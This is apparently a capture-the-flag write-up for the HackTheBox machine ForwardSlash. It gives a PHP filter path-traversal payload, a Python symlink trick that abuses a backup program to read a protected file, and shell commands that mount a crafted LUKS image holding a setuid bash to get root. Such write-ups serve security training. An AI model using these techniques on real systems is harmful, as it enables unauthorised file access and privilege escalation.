ForwardSlash @ HackTheBox • Vulndev

04JulJuly 4, 2020

ForwardSlash @ HackTheBox

By xct CTF hackthebox, linux, luks, path traversal

ForwardSlash is a 40-point Linux Machine on HackTheBox. We use a path traversal vulnerability to get ssh credentials and abuse a custom backup program to read an old configuration file. For root we mount a custom LUKS image that contains a setuid program.

Notes

PHP Filter:

php://filter/convert.base64-encode/resource=dev/index.php

Backup Tool:

import hashlib
import os
import time

m = hashlib.md5()
m.update(str(time.strftime("%H:%M:%S")))
os.system('ln -s /home/pain/user.txt '+m.hexdigest())
os.system('/usr/bin/backup')

Luks Local:

dd if=/dev/zero of=/tmp/vol bs=1M count=64
sudo cryptsetup -vy luksFormat /tmp/vol
sudo cryptsetup luksOpen /tmp/vol vol
sudo mkfs.ext4 /dev/mapper/vol
sudo mount /dev/mapper/vol /mnt
scp pain@forwardslash.htb:/bin/bash  .
cp bash /mnt/bash; chmod u+s /mnt/bash
sudo umount /mnt && sudo cryptsetup luksClose vol
scp /tmp/vol pain@forwardslash.htb:/tmp/vol

LUKS Remote:

sudo cryptsetup luksOpen /tmp/vol backup
cd
mkdir mnt
sudo /bin/mount /dev/mapper/backup ./mnt/
cd mnt; ./bash -p

Author

xct

Related Posts

04MayMay 4, 2019

OneTwoSeven @ HackTheBox

Onetwoseven is a great machine on hackthebox, featuring symbolic links, port forwarding through sftp and some typical web application exploitation.... read more

27FebFebruary 27, 2021

Academy @ HackTheBox

Solving Academy on HackTheBox, a 20-point Linux machine on HackTheBox that involves a Laravel deserialization RCE, stored credentials & sudo... read more

01FebFebruary 1, 2020

RE @ HackTheBox

RE is a 40 point windows machine on HackTheBox that involves uploading an ods file with a malicious macro, abusing... read more

03AugAugust 3, 2019

Fortune @ HackTheBox

Fortune is a 50 point machine on hackthebox.eu featuring OpenBSD. I was lucky enough to get first blood on this... read more

28MarMarch 28, 2019

Arkham @ HackTheBox

Arkham was a surprisingly hard box for the 30 points that were awarded for it, as I was struggling quite... read more

22JanJanuary 22, 2022

SSRF & Python Debugger – Forge @ HackTheBox

We are solving Forge, a medium difficulty Linux machine on HackTheBox which involves an SSRF & playing with the python... read more

16MayMay 16, 2020

Patents @ HackTheBox

Patents is a 40-point Linux machine on HackTheBox. For user we exploit an external entity injection in a word document... read more

16OctOctober 16, 2021

Dynamic DNS & Command Injection – Dynstr @ HackTheBox

We are solving Dynstr, a 30-point Linux machine on HackTheBox that involves a Dynamic DNS Service & a Command Injection. read more

02MayMay 2, 2020

OpenAdmin @ HackTheBox

OpenAdmin is a 20-Point Linux machine on HackTheBox that involves using a public exploit for OpenNetAdmin & abusing a sudo... read more

14MarMarch 14, 2020

Postman @ HackTheBox

Postman is a 20-point machine on hackthebox, that involves using redis to write an ssh key to disk, cracking the... read more